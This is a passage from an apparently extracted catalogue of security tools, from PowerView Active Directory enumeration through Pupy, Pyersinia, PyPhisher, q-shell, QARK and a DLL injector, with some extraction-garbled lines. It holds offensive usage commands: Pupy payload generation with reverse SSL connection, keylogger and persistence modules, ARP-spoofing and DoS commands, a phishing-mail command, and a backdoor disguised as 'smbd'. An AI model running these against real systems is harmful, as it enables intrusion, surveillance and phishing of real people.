gets a list of all
gets a list of all
organization units
Get-NetSite
a domain
Get-NetSubnet
subnets for a domain
Get-NetGroup
current groups in a domain
Get-NetGroupMember
current users in a specified domain group

Get-NetLocalGroup
gets the members of a
localgroup on a remote host or hosts

Add-NetGroupUser
adds a local or
domain user to a local or domain group

Get-NetFileServer
get a list of file
servers used by current domain users

Get-DFSshare
gets a list of all
distribute file system shares on a domain

Get-NetShare
gets share
information for a specified server

Get-NetLoggedon
gets users actively
gets active sessions
gets active RDP
logged onto a specified server

Get-NetSession
on a specified server
Get-NetRDPSession
sessions for a specified server (like qwinsta)

Get-LastLoggedOn
return the last
gets the remote
logged on user for a target host

Get-NetProcess
processes and owners on a remote server

Get-UserEvent
returns logon or TGT
events from the event log for a specified host

Get-ADObject
takes a domain SID
and returns the user, group, or computer

object associated
with it
Set-ADObject
takes a SID, name, or
SamAccountName to query for a specified

domain object, and
then sets a specified 'PropertyName' to a

specified
'PropertyValue'
GPO functions
Get-GptTmpl
parses a GptTmpl.inf
gets all current GPOs
gets all GPOs in a
to a custom object
Get-NetGPO
for a given domain
Get-NetGPOGroup
domain that set "Restricted Groups"

on on target machines
Find-GPOLocation
takes a user/group
and makes machines they have effective

rights over through
GPO enumeration and correlation
Find-GPOComputerAdmin
takes a computer and
determines who has admin rights over it

through GPO
enumeration
Get-DomainPolicy
returns the default
finds machines on the
domain or DC policy
User-Hunting Functions:
Invoke-UserHunter
local domain where specified users are logged into, and

can optionally check if the current user has local admin
access to found machines
Invoke-StealthUserHunter
finds all file
servers utilizes in user HomeDirectories, and checks the

sessions one each file server, hunting for particular
users
Invoke-ProcessHunter
hunts for processes
with a specific name or owned by a specific user on

domain machines
Invoke-UserEventHunter
hunts for user logon
events in domain controller event logs
Domain Trust Functions:

Get-NetDomainTrust
gets all trusts for
gets all trusts for
the current user's domain

Get-NetForestTrust
the forest associated with the current user's domain

Find-ForeignUser
enumerates users who
are in groups outside of their principal domain

Find-ForeignGroup
enumerates all the
members of a domain's groups and finds users that are

outside of the queried domain
Invoke-MapDomainTrust
try to build a
relational mapping of all domain trusts
MetaFunctions:
Invoke-ShareFinder
finds (non-standard)
shares on hosts in the local domain

Invoke-FileFinder
finds potentially
sensitive files on hosts in the local domain

Find-LocalAdminAccess
finds machines on the
domain that the current user has local admin access to
Find-UserField
searches a user field
searches a computer
finds systems likely
enumerates members of
for a particular term

Find-ComputerField
field for a particular term
Get-ExploitableSystem
vulnerable to common exploits
Invoke-EnumerateLocalAdmin
the local Administrators groups across all machines in

the domain
Download PowerTools
PROGUARD - JAVA CLASS FILE SHRINKER, OPTIMIZER,
OBFUSCATOR AND PREVERIFIER
ProGuard is a free Java class file shrinker, optimizer,

obfuscator, and preverifier. It detects and removes unused
classes, fields, methods, and attributes. It optimizes bytecode
and removes unused instructions. It renames the remaining
classes, fields, and methods using short meaningless names.
Finally, it preverifies the processed code for Java 6 or higher, or
for Java Micro Edition.
Some uses of ProGuard are:
Creating more compact code, for smaller code archives,
faster transfer across networks, faster loading, and
smaller memory footprints.
Making programs and libraries harder to reverse-engineer.
Listing dead code, so it can be removed from the source
code.
Retargeting and preverifying existing class files for Java 6
or higher, to take full advantage of their faster class
loading.
ProGuard's main advantage compared to other Java
obfuscators is probably its compact template-based
configuration. A few intuitive command line options or a simple
configuration file are usually sufficient. The user manual
explains all available options and shows examples of this
powerful configuration style.
ProGuard is fast. It only takes seconds to process programs
and libraries of several megabytes. The results section
presents actual figures for a number of applications.
ProGuard is a command-line tool with an optional graphical
user interface. It also comes with plugins for Ant, for Gradle,
and for the JME Wireless Toolkit.
WHAT IS SHRINKING?
Java source code (.java files) is typically compiled to bytecode

(.class files). Bytecode is more compact than Java source
code, but it may still contain a lot of unused code, especially if it
includes program libraries. Shrinking programs such as
ProGuard can analyze bytecode and remove unused classes,
fields, and methods. The program remains functionally
equivalent, including the information given in exception stack
traces.
WHAT IS OBFUSCATION?
By default, compiled bytecode still contains a lot of debugging

information: source file names, line numbers, field names,
method names, argument names, variable names, etc. This
information makes it straightforward to decompile the bytecode
and reverse-engineer entire programs. Sometimes, this is not
desirable. Obfuscators such as ProGuard can remove the
debugging information and replace all names by meaningless
character sequences, making it much harder to reverseengineer the code. It further compacts the code as a bonus.
The program remains functionally equivalent, except for the
class names, method names, and line numbers given in
exception stack traces.
WHAT IS PREVERIFICATION?
When loading class files, the class loader performs some

sophisticated verification of the byte code. This analysis makes
sure the code can't accidentally or intentionally break out of the
sandbox of the virtual machine. Java Micro Edition and Java 6
introduced split verification. This means that the JME preverifier
and the Java 6 compiler add preverification information to the
class files (StackMap and StackMapTable attributes,
respectively), in order to simplify the actual verification step for
the class loader. Class files can then be loaded faster and in a
more memory-efficient way. ProGuard can perform the
preverification step too, for instance allowing to retarget older

class files at Java 6.
WHAT KIND OF OPTIMIZATIONS DOES PROGUARD SUPPORT?
Apart from removing unused classes, fields, and methods in the

shrinking step, ProGuard can also perform optimizations at the
bytecode level, inside and across methods. Thanks to
techniques like control flow analysis, data flow analysis, partial
evaluation, static single assignment, global value numbering,
and liveness analysis, ProGuard can:
Evaluate constant expressions.
Remove unnecessary field accesses and method calls.
Remove unnecessary branches.
Remove unnecessary comparisons and instanceof tests.
Remove unused code blocks.
Merge identical code blocks.
Reduce variable allocation.
Remove write-only fields and unused method parameters.
Inline constant fields, method parameters, and return
values.
Inline methods that are short or only called once.
Simplify tail recursion calls.
Merge classes and interfaces.
Make methods private, static, and final when possible.
Make classes static and final when possible.
Replace interfaces that have single implementations.
Perform over 200 peephole optimizations, like
replacing ...*2 by ...<<1.
Optionally remove logging code.
The positive effects of these optimizations will depend on your
code and on the virtual machine on which the code is executed.
Simple virtual machines may benefit more than advanced
virtual machines with sophisticated JIT compilers. At the very
least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
Moving constant expressions out of loops.

Optimizations that require escape analysis (DexGuard
does).
DownloadProGuard
PROJECT ARTILLERY - FULL SUITE FOR PROTECTION
AGAINST ATTACK ON LINUX AND WINDOWS
Project Artillery is an open source project aimed at the

detection of early warning indicators and attacks. The concept
is that Artillery will spawn multiple ports on a system giving the
attacker the idea that multiple ports are exposed. Additionally,
Artillery actively monitors the filesystem for changes, brute
force attacks, and other indicators of compromise. Artillery is a
full suite for protection against attack on Linux and Windows
based devices. It can be used as an early warning indicator of

attackers on your network. Additionally, Artillery integrates into
threat intelligence feeds which can notify when a previously
seen attacker IP address has been identified. Artillery supports
multiple configuration types, different versions of Linux, and can
be deployed across multiple systems and events sent centrally.
Artillery is a combination of a honeypot, monitoring tool, and
alerting system. Eventually this will evolve into a hardening
monitoring platform as well to detect insecure configurations
from nix systems. It's relatively simple, run ./setup.py and hit
yes, this will install Artillery in /var/artillery and edit your /
etc/init.d/rc.local to start artillery on boot up.
Features
1. It sets up multiple common ports that are attacked. If

someone connects to these ports, it blacklists them
forever (to remove blacklisted ip's, remove them from /
var/artillery/banlist.txt)
2. It monitors what folders you specify, by default it checks /
var/www and /etc for modifications.
3. It monitors the SSH logs and looks for brute force
attempts.
4. It will email you when attacks occur and let you know what
the attack was.
Be sure to edit the /var/artillery/config to turn on mail
delivery, brute force attempt customizations, and what folders
to monitor.
Project structure
For those technical folks you can find all of the code in the
following structure:
src/core.py - main central code reuse for things shared
between each module
src/monitor.py - main monitoring module for changes to
the filesystem
src/ssh_monitor.py - main monitoring module for SSH
brute forcing
src/honeypot.py - main module for honeypot detection

src/harden.py - check for basic hardening to the OS
database/integrity.data - main database for
maintaining sha512 hashes of filesystem

setup.py - copies files to /var/artillery/ then edits /
etc/init.d/artillery to ensure artillery starts per each
reboot
Supported platforms
Linux
Windows
Video Installation of Artillery
Simple "Project Artillery" Installation and

Configuration on Linux
from David Kennedy

Play
DownloadProject Artillery
PROXENET - HACKER FRIENDLY PROXY FOR WEB
APPLICATION PENETRATION TESTS
Proxenet is a hacker friendly proxy for web application

penetration tests.
proxenet is a multi-threaded proxy which allows you
manipulate your HTTP requests and responses using your

favorite scripting language. No need to learn Java (like for
Burp) or Python (like for mitmproxy). proxenet supports heaps
of languages (see the section "Language Versions") and more
can be easily added.
proxenet is not script kiddie friendly, neither GUI friendly. If
this is what you are looking for, here are a few links for you:
ZAP
Burp
ProxyStrike
Or the best way, write your own GUI as a proxenet plugin!
Why ?
The idea behind proxenet came after a lot of frustration from

attempting to write extensions for Burp. Moreover, only a few
proxies already existing supports the possibility to add new
extensions. And when they do, they are (one) language specific
- despite Burp persistent attempts to make unnatural bindings
(Python over Java or worse Ruby over Java.
Being written in pure C, it is fast, efficient and easily pluggable
to anything else. It is the utimate real DIY web proxy for
pentest(ers).
Features
Here are a sample of features already supported by proxenet:

Written in C
Fast (heavy thread use)
Efficient (POSIX compatible)
Low memory footprint (for the core)
Can interact with any language
Provides plugins support for the following languages:
C
Python
Lua
Ruby
Perl
Tcl
Java
SSL
Full SSL interception (internal CA)
SSL client certificate authentication
IPv4/IPv6
HTTP Proxy forwarding
White-list/Black-list hosts filtering
Command interface out-of-band
Nice TTY colors :D
100% Open-Source
... and more !
The best of both world ?
Some people might miss the beautiful interface some other

GUI-friendly proxies provide. So be it! Plug proxenet as a relay
behind your favorite Burp,Zap, Proxystrike, burst, etc. and
enjoy the show!
How to start
$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make
DownloadProxenet
PROXYDROID - SET PROXYS (HTTP / SOCKS4 / SOCKS5)
ON YOUR ANDROID DEVICES
ProxyDroid is an app that can help you to set the proxy (http /
socks4 / socks5) on your android devices.
FEATURES
1.
2.
3.
4.
5.
Support HTTP / HTTPS / SOCKS4 / SOCKS5 proxy

Support basic / NTLM / NTLMv2 authentication methods
Individual proxy for only one or several apps
Multiple profiles support
Bind configuration to WIFI's SSID / Mobile Network (2G /
3G)
6. Widgets for quickly switching on/off proxy

7. Low battery and memory consumption (written in C and
compiled as native binary)
8. Bypass custom IP address
9. DNS proxy for guys behind the firewall that disallows to
resolve external addresses
10. PAC file support (only basic support, thanks to Rhino)
DowbloadProxyDroid
PUPY - MULTI-PLATFORM REMOTE ADMINISTRATION
TOOL
Pupy is an opensource, multi-platform Remote Administration
Tool written in Python. On Windows, Pupy uses reflective dll
injection and leaves no traces on disk.
Features :
On windows, the Pupy payload is compiled as a reflective

DLL and the whole python interpreter is loaded from
memory. Pupy does not touch the disk :)
Pupy can reflectively migrate into other processes
Pupy can remotely import, from memory, pure python
packages (.py, .pyc) and compiled python C extensions
(.pyd). The imported python modules do not touch the
disk. (.pyd mem import currently work on Windows
only, .so memory import is not implemented).
modules are quite simple to write and pupy is easily
extensible.
Pupy uses rpyc and a module can directly access python
objects on the remote client
we can also access remote objects interactively from
the pupy shell and even auto completion of remote
attributes works !
communication channel currently works as a ssl reverse
connection, but a bind payload will be implemented in the

future
all the non interactive modules can be dispatched on
multiple hosts in one command
Multi-platform (tested on windows 7, windows xp, kali
linux, ubuntu)
modules can be executed as background jobs
commands and scripts running on remote hosts are
interruptible
auto-completion and nice colored output :-)
commands aliases can be defined in the config
Implemented Modules :
migrate (windows only)

inter process architecture injection also works (x86>x64 and x64->x86)
keylogger (windows only)
persistence (windows only)
screenshot (windows only)
webcam snapshot (windows only)
command execution
download
upload
socks5 proxy
local port forwarding
interactive shell (cmd.exe, /bin/sh, ...)
interactive python shell
shellcode exec (thanks to @byt3bl33d3r)
Quick start
In these examples the server is running on a linux host (tested
on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali
linux, ubuntu, Mac OS X 10.10.5)
generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o
pupyx86.exe
you can also use -t dll_x86 or dll_x64 to generate a reflective

DLL and inject/load it by your own means.
for Linux
pip install rpyc #(or manually copy it if you are not
admin)
python reverse_ssl.py 192.168.0.1:443
for MAC OS X
easy_install rpyc #(or manually copy it if you are not
admin)
python reverse_ssl.py 192.168.0.1:443
start the server
1. eventually edit pupy.conf to change the bind address / port

2. start the pupy server :
./pupysh.py
Some screenshots
list connected clients
help
execute python code on all clients
execute a command on all clients, exception is retrieved in

case the command does not exists
use a filter to send a module only on selected clients
migrate into another process
interactive shell
interactive python shell
example: How to write a MsgBox module

first of all write the function/class you want to import on the
remote client
in the example we create the file pupy/packages/windows/all/
pupwinutils/msgbox.py
import ctypes
import threading
def MessageBox(text, title):
t=threading.Thread(target=ctypes.windll.user32.MessageBox
A, args=(None, text, title, 0))
t.daemon=True
t.start()
then, simply create a module to load our package and call the
function remotely
class MsgBoxPopup(PupyModule):
""" Pop up a custom message box """
def init_argparse(self):
self.arg_parser =
PupyArgumentParser(prog="msgbox",
description=self.__doc__)
self.arg_parser.add_argument('--title',
help='msgbox title')
self.arg_parser.add_argument('text', help='text
to print in the msgbox :)')
@windows_only
def is_compatible(self):
pass
def run(self, args):
self.client.load_package("pupwinutils.msgbox")
self.client.conn.modules['pupwinutils.msgbox'].MessageBox
(args.text, args.title)
self.log("message box popped !")
Dependencies
rpyc (https://github.com/tomerfiliba/rpyc)
Roadmap and ideas
Some ideas without any priority order

support for https proxy
bind instead of reverse connection
add offline options to payloads like enable/disable
certificate checking, embed offline modules (persistence,
keylogger, ...), etc...
integrate scapy in the windows dll :D (that would be fun)
work on stealthiness and modules under unix systems
webcam snap
mic recording
socks5 udp support
remote port forwarding
perhaps write some documentation
...
any cool idea ?
DownloadPupy
PYERSINIA - NETWORK ATTACK TOOL
Pyersinia is a similar tool to Yersinia, but Pyersinia is

implemented in Python using Scapy. The main objective is the
realization of network attacks such as spoofing ARP, DHCP
DoS , STP DoS among others. The community can add new
attacks on the tool in a simple way, using plugins. This is
because Pyersinia uses the STB (Security Tools Builder)
framework.
WHAT'S NEW?
Adding new attacks on the tool is a simple task because we
use the framework STB (Security Tool Builder). The new
attacks are added by plugins.
INSTALLATION
Install pyersinia is so easy:
$ python -m pip install pyersinia
Or install from Pypi:

# pip install pyersinia
QUICK START
You can display inline help writing:
arp_spoof_TARGET
arp_spoof_VICTIM
optional arguments:
-h, --help
-v, --verbosity
verbosity level
-a ATTACK_TYPE
choose supported attack type
-i IFACE
choose network interface
supported attacks:
arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf,
stp_root
examples:
python pyersinia.py -a arp_spoof 127.0.0.1
127.0.0.1
python pyersinia.py -a stp_root -i eth0
Download Pyersinia
PYPHISHER - A SIMPLE PYTHON TOOL FOR PHISHING
If you are looking to make a phishing testing or demonstration
you can check PyPhisher. This tool was created for the
purpose of phishing during a penetration test. This tool is
python based that provide user a way to send emails with a
customized template that he design. you can have an html
format that is similar to any organization and replace the links
that you want to send.
This was inspired by SpearPhiser beta by Dave Kennedy from
Trustedsec and a feature found in Cobalt Strike by Rapheal
Mudge from Strategic Cyber
Usage:
PyPhisher.py --server mail.server.com --port 25 -username user --password password --html phish.txt -url_replace phishlink.com --subject Read!! --sender
important@phish.com --sendto target@company.com
Available options:
--server
The SMTP server that you are going to
be using to send the email

--port
The port number that is setup for SMTP
--html
The pre-crafted html that will be used
in the email
--url_replace
The url that will be used to replace
all links in the email

--subject
email message
The subject that will appear in the
--sender
The sender that will appear on the
email example
--sendto
Who you would like to send the email to
Download PyPhisher
Q-SHELL - QUICK SHELL FOR UNIX ADMINISTRATOR
q-shell is quick shell for remote login into Unix system, it use
blowfish crypt algorithm to protect transport data from client to
server, you can get two program: 'qsh' for client, and 'qshd' for
server, those program can rename by any name with you
prefer.
Compile
Just enter 'make' and it will automation to compile, but, you

must input the server key.
Usage
1. server:
Just run qshd on server:
$ ./qshd
2.
But, you would like to run after change it to other name,

such as:
$ mv qshd smbd
3.
$ export PATH=.:$PATH
4.
$ smbd
5.
6. client:
Set some environment variable, then run qsh:
$ export _IP=127.0.0.1
7.
$ export _PORT=2800
8.
$ unset _P
9.
$ ./qsh shell
10.
Now you already login into server $_IP .

More function
q-shell include more function to manage system:

1. put/get files:
$ ./qsh get /path/to/server/file .
2. $ ./qsh put /path/to/local/file
/path/to/server/file
3.
4. run a command on server:

$ ./qsh exec 'ls -l /bin'
5.
6. update server program:

$ ./qsh update /path/to/local/qshd
7.
This function will update remote qshd, and run again.

8. automation to run command on many server:
$ for i in {10..20} ; do \
9.
export _IP=192.168.0.$i
10.
export _PORT=2800
11.
export _P=key
12.
./qsh exec 'ls -l /bin'
13.
# set key
done
14.
Note: qsh use $_P to fetch server key, so you should

erase all history data after to use $_P.
15. update password
start with version 3.2, you can update the password as
below:
$ ./qsh passwd
16.
Download Q-shell
QARK - TOOL TO LOOK FOR SEVERAL SECURITY
RELATED ANDROID APPLICATION VULNERABILITIES
Quick Android Review Kit - This tool is designed to look for

several security related Android application vulnerabilities,
either in source code or packaged APKs. The tool is also
capable of creating "Proof-of-Concept" deployable APKs and/or
ADB commands, capable of exploiting many of the
vulnerabilities it finds. There is no need to root the test device,
as this tool focuses on vulnerabilities that can be exploited
under otherwise secure conditions.
Usage
To run in interactive mode:

$ python qark.py
To run in headless mode:

$ python qark.py --source 1 --pathtoapk /Users/foo/qark/
sampleApps/goatdroid/goatdroid.apk --exploit 1 --install
1
or
$ python qark.py --source 2 -c /Users/foo/qark/
sampleApps/goatdroid/goatdroid --manifest /Users/foo/
qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml
--exploit 1 --install 1
The sampleApps folder contains sample APKs that you can test
against QARK
Requirements
python 2.7.6
JRE 1.6+ (preferably 1.7+)
OSX or Ubuntu Linux (Others may work, but not fully
tested)
Documentation
QARK is an easy to use tool capable of finding common

security vulnerabilities in Android applications. Unlike
commercial products, it is 100% free to use. QARK features
educational information allowing security reviewers to locate
precise, in-depth explanations of the vulnerabilities. QARK
automates the use of multiple decompilers, leveraging their
combined outputs, to produce superior results, when
decompiling APKs. Finally, the major advantage QARK has
over traditional tools, that just point you to possible
vulnerabilities, is that it can produce ADB commands, or even
fully functional APKs, that turn hypothetical vulnerabilities into
working "POC" exploits.
Included in the types of security vulnerabilities this tool attempts
to find are:
Inadvertently exported components
Improperly protected exported components
Intents which are vulnerable to interception or
eavesdropping
Improper x.509 certificate validation
Creation of world-readable or world-writeable files
Activities which may leak data
The use of Sticky Intents
Insecurely created Pending Intents
Sending of insecure Broadcast Intents
Private keys embedded in the source

Weak or improper cryptography use
Potentially exploitable WebView configurations
Exported Preference Activities
Tapjacking
Apps which enable backups
Apps which are debuggable
Apps supporting outdated API versions, with known
vulnerabilities
Roadmap
Things that are coming soon:

Rewrite of code to support extensibility
Bound Service vulnerability detection and exploitation
Content Provider vulnerability detection and exploitation
Additional WebView configuration demonstrations
Static Tapjacking mitigation detection
File browser capable of using root permissions
DownloadQARK
RAWR - RAPID ASSESSMENT OF WEB RESOURCES
Features
A customizable CSV containing ordered information
gathered for each host, with a field for making notes/etc.
An elegant, searchable, JQuery-driven HTML report that

shows screenshots, diagrams, and other information.
A report on relevent security headers, courtesy of

SmeegeSec.
a CSV Threat Matrix for an easy view of open ports across

all provided hosts. (Use -a to show all ports.)
A wordlist for each host, comprised of all words found in

responses. (including crawl, if used).
Default password suggestions through checking a service's
CPE for matches in the DPE Database.
A shelve database of all host information. (planned comparison
functionality)
Parses meta-data in documents and photos using customizable
modules.
Supports the use of a proxy (Burp, Zap, W3aF)
Captures/stores SSL Certificates, Cookies, and Crossdomain.xml
[Optional] Customizable crawl of links within the host's domain.
[Optional] PNG Diagram of all pages found during crawl
[Optional] List of links crawled in tiered format.

[Optional] List of documents seen for each site.
[Optional] Automation-Friendly output (JSON strings)
Input
Using Prior Scan Data

-c <RAWR .cfg file>
.cfg files containing that scan's settings are
created for every run.
-f <file, csv list of files, or directory>

It will parse the following formats:
NMap - XML (requires -sV)
Nessus - XML v2 (requires "Service Detection"
plugin)
Metasploit - CSV
Qualys - Port Services Report CSV
Qualys - Asset Search XML (requires QIDs
86000,86001,86002)
Nexpose - Simple XML, XML, XML v2
OpenVAS - XML
Using NMap
RAWR accepts valid NMap input strings (CIDR, etc)
as an argument
-i can be used to feed it a line-delimited list.
use -t <timing> and/or -s <source port>

use -p <port|all|fuzzdb> to specify port #(s), all for
1-65353, or fuzzdb to use the FuzzDB Common

Ports
--ssl will call enum-ciphers.nse for more in-depth

SSL data.
Enumeration
In [conf/settings.py], 'flist' defines the fields that will be in

the CSV as well as the report.
The section at the bottom - "DISABLED COLUMNS"
is a list of interesting data points that are not shown
by default.
--dns will have it query Bing for other hostnames and add
them to the queue.
(Planned) If IP is non-routable, RAWR will request an
AXFR using 'dig'
This is for external resources - non-routables are
skipped.
Results are cached for the duration of the scan to
prevent unneeded calls.
-o, -r, and -x make additional calls to grab HTTP

OPTIONS, robots.txt, and crossdomain.xml,
respectively
Try --downgrade to make requests with HTTP/1.0

Possible to glean more info from the 'chattier' version
Screenshots are still made via HTTP/1.1, so expect
that when viewing the traffic.
--noss will omit the collection of screenshots

The HTML report still functions, but will show the '!'
image for all hosts.
Proxy your requests with --proxy=<ip:port>

This works well with BurpSuite, Zap, or W3aF.
Crawl the site with --spider, notating files and docs in the
log directory's 'maps' folder.
Defaults: [conf/settings.py] follow subdomains, 3
links deep, timeout at 3min, limit to 300 urls
If graphviz and python-graphviz are installed, it will
create a PNG diagram of each site that is crawled.
Start small and make adjustments outward in respect
to your scanning environment. Please use caution to
avoid trouble. :)
Use -S <1-5> to apply one of the crawl intensity presets.

The default is 3.
--mirror is the same as --spider, but will also make a

copy of each site during the crawl.
Use --spider-opts <opts> to define crawl settings on the

fly.
's' = 'follow subdomains', 'd' = depth, 't' = timeout, 'l' =
url limit
Not all are required, nor do they have to be in any
particular order.
Example: --spider-opts s:false,d:2,l:500
Also for spidering, --alt-domains <domains> will whitelist

domains you want to follow during the crawl.
By default, it won't leave the originating domain.
Example: --alt-domains
domain1.com,domain2.com,domain3.com
--blacklist-urls <input list> will blacklist domains
you don't want to crawl.
Output
-a is used to include all open ports in the CSV output and

the Threat Matrix.
-m will create the Threat Matrix from provided input and

exit (no scan).
-d <folder> changes the log folder's location from the

default "./"
Example: -d ./Desktop/RAWR_scans_20140227 will
create that folder and use it as your log dir.
-q or --quiet mutes display of the dinosaur on run.

Still in disbelief that anyone would want this... made 2
switches for it, to show that I'm a good sport. :)
Compress the log folder when the scan is complete with

-z.
--json and --json-min are the automation-friendly

outputs from RAWR.
--json only kicks out JSON lines to STDOUT, while

still creating all of the normal output files.
--json-min creates no output files, only JSON strings
to STDOUT
Use --parsertest if you're testing a custom parser. It

parses input, displays the first 3 lines, and quits.
-v makes output verbose.
Report Customization
-e excludes the 'Default password suggestions' from your

output.
This was suggested as an 'Executive' option.
Give your HTML report a custom logo and title with -logo=<file> and --title=<title>.
The image will be copied into the report folder.
Click 'printable' in the HTML report to view the
custom header.
Updating
-u runs update and prompts if a file is older than the

current version.
Files downloaded are defpass.csv and
Ip2Country.tar.gz.
It checks for phantomJS and will download after
prompting.
-U runs update and downloads the files mentioned above

regardless of their version, without prompting.
DownloadRAWR
REKALL - THE MOST COMPLETE MEMORY ANALYSIS
FRAMEWORK
The Rekall Framework is a completely open collection of tools,

implemented in Python under the GNU General Public License,
for the extraction of digital artifacts from volatile memory (RAM)
samples. The extraction techniques are performed completely
independent of the system being investigated but offer visibilty
into the runtime state of the system. The framework is intended
to introduce people to the techniques and complexities
associated with extracting digital artifacts from volatile memory
samples and provide a platform for further work into this
exciting area of research.
The Rekall distribution is available from: http://www.rekallforensic.com/
Rekall should run on any platform that supports Python (http://
www.python.org)
Rekall supports investigations of the following x86 bit memory
images:
Microsoft Windows XP Service Pack 2 and 3
Microsoft Windows 7 Service Pack 0 and 1
Linux Kernels 2.6.24 to 3.10.
OSX 10.6-10.8.
Rekall also provides a complete memory sample acquisition

capability for all major operating systems (see the tools
directory).
Quick start
Rekall is available as a python package installable via the pip

package manager. Simply type (for example on Linux):
sudo pip install rekall
You might need to specifically allow pre-release software to be
included (until Rekall makes a major stable release):

sudo pip install --pre rekall
To have all the dependencies installed. You still need to have

python and pip installed first.
To be able to run the ipython notebook, the following are also
required:
pip
install
Jinja2
MarkupSafe
Pygments
astroid
pyzmq
tornado wsgiref
For windows, Rekall is also available as a self contained

installer package. Please check the download page for the
most appropriate installer to use.
Development version
For development it is easier to install rekall inside a virtual env.

Virtual Env is a way for containing and running multiple
versions of python packages at the same time, without
interfering with the host system.
# You might need to install virtualenv:
$ sudo apt-get install python-virtualenv
# This will build a new empty python environment.
$ virtualenv /tmp/Test
# Now we switch to the environment - all python code runs
from here.
$ source /tmp/Test/bin/activate
# This will install all dependencied into the virtual
environment.
$ pip install --pre rekall
# For development run the devel version
$ git clone https://github.com/google/rekall.git

$ cd rekall
$ python setup.py develop
When done you can just remove the /tmp/Test directory.
DownloadRekall
REMNUX V6 - A LINUX TOOLKIT FOR REVERSEENGINEERING AND ANALYZING MALWARE
REMnux is a free Linux toolkit for assisting malware analysts

with reverse-engineering malicious software. It strives to make
it easier for forensic investigators and incident responders to
start using the variety of freely-available tools that can examine
malware, yet might be difficult to locate or set up.
The heart of the project is the REMnux Linux distribution based
on Ubuntu. This lightweight distro incorporates many tools for
analyzing Windows and Linux malware, examining browserbased threats such as obfuscated JavaScript, exploring
suspicious document files and taking apart other malicious
artifacts. Investigators can also use the distro to intercept
suspicious network traffic in an isolated lab when performing
behavioral malware analysis.
Malware Analyis Tools Installed on REMnux
The REMnux distribution includes many free tools useful for

examining malicious software. These utilities are set up and
tested to make it easier for you to perform malware analysis
tasks without needing to figure out how to install them. The
majority of these tools are listed below.
Examine Browser Malware
Website analysis: Thug, mitmproxy, Network Miner Free
Edition, curl, Wget, Burp Proxy Free Edition, Automater,
pdnstool, Tor, tcpextract, tcpflow, passive.py, CapTipper
Flash: xxxswf, SWF Tools, RABCDAsm, extract_swf,
Flare
Java: Java Cache IDX Parser, JD-GUI Java Decompiler,
JAD Java Decompiler, Javassist, CFR
JavaScript: Rhino Debugger, ExtractScripts, Firebug,
SpiderMonkey, V8, JS Beautifier
Examine Document Files
PDF: AnalyzePDF, Pdfobjflow, pdfid, pdf-parser, peepdf,
Origami, PDF X-RAY Lite, PDFtk, swf_mastah
Microsoft Office: officeparser, pyOLEScanner.py, oletools,
libolecf, oledump, emldump
Shellcode: sctest, unicode2hex-escaped, unicode2raw,
dism-this, shellcode2exe
Extract and Decode Artifacts
D e o b f u s c a t e : u n X O R, XO RSt r ings , e x _ p e _ x o r,
XORSearch, brutexor/iheartxor, xortool, NoMoreXOR,

XORBruteForcer, Balbuzard
Extract strings: strdeobj, pestr, strings
Carving: Foremost, Scalpel, bulk_extractor, Hachoir
Handle Network Interactions

Sniffing: Wireshark, ngrep, TCPDump, tcpick
Services: FakeDNS, Nginx, fakeMail, Honeyd, INetSim,
Inspire IRCd, OpenSSH, accept-all-ips
Miscellaneous network: prettyping.sh, set-static-ip, renewdhcp, Netcat, EPIC IRC Client, stunnel
Process Multiple Samples
Maltrieve, Ragpicker, Viper, MASTIFF, Density Scout
Examine File Properties and Contents
Define signatures: YaraGenerator, IOCextractor, Autorule,
Rule Editor
Scan: Yara, ClamAV, TrID, ExifTool, virustotal-submit,
Disitool
Hashes: nsrllookup, Automater, Hash Identifier, totalhash,
ssdeep, virustotal-search, VirusTotalApi
Investigate Linux Malware
System: Sysdig, Unhide
Disassemble: Vivisect, Udis86, objdump
Debug: Evans Debugger (EDB), GNU Project Debugger
(GDB)
Trace: strace, ltrace
Investigate: Radare 2, Pyew, Bokken, m2elf
Edit and View Files
Text: SciTE, Geany, Vim
Images: feh, ImageMagick
Binary: wxHexEditor, VBinDiff
Documents: Xpdf
Examine Memory Snapshots

V o l a t i l i t y F r a m e w o r k , fi n d a e s , A E S K e y F i n d e r ,
RSAKeyFinder, VolDiff, Rekall
Statically Examine PE Files
Unpacking: UPX, Bytehist, Density Scout, PackerID
Disassemble: objdump, Udis86, Vivisect
Find anomalies: Signsrch, pescanner, ExeScan, pev,
Peframe, pedump
Investigate: Bokken, RATDecoders, Pyew, readpe.py,
PyInstaller Extractor
Investigate Mobile Malware
Androwarn, AndroGuard
Perform Other Tasks
ProcDOT, bashhacks, Docker, vtTool, REMnux Updater,
Decompyle++
REMnux Documentation
REMnux documentation is a relatively recent effort, which can

provide additional details regarding the toolkit. The document
set in need of improvement and expansion.
The one-page REMnux cheat sheet highlights some of the
most useful tools and commands available as part of the
REMnux distro. Its an especially nice starting point for people
who are new to the distribution.
Malware Analysis Essentials Using REMnux
DownloadREMnux v6
REMOTE DLL INJECTOR V2.0 - COMMAND-LINE TOOL TO
INJECT DLL INTO REMOTE PROCESS
Remote DLL Injector is the free command-line tool to Inject

DLL into remote process.Currently it supports DLL injection
using the CreateRemoteThreadtechnique.
Being a command-line tool makes it easy to integrate into your
automation scripts. Also useful when you are remotely
operating on the system especially during Pen Testing
situations.
One of the unique feature of Remote DLL Injector is its ability
Inject DLL into ASLR enabled processes. It dynamically

calculates DLL and function offsets within target process before
the injection operation.
It is fully portable & includes both 32-bit & 64-bit versions. It
has been successfully tested on all platforms starting from
Windows XP to Windows 8.
How to use?
RemoteDLL Injector is a command-line based tool. Hence it

must be launched from cmd prompt as shown below.
Note that it includes 32-bit & 64-bit version. For Injecting DLL
into 32-bit Process (on 32-bit or 64-bit platform) use
RemoteDLLInjector32.exe and for 64-bit Process use
RemoteDLLInjector64.exe
Here are the simple usage information,
RemoteDLLInjector.exe
<pid>
<dll_file_path>
-h
This help screen
<pid>
Process ID of remote process to
Inject DLL
<dll_file_path>
Full path of DLL to be injected
Examples of RemoteDLLInjector
//Show the help screen
RemoteDLLInjector.exe -h
//Inject DLL into 32-bit process with pid 1551
RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
//Inject DLL into 64-bit process with pid 1001
RemoteDLLInjector64.exe 1001 "c:\inject64.dll"
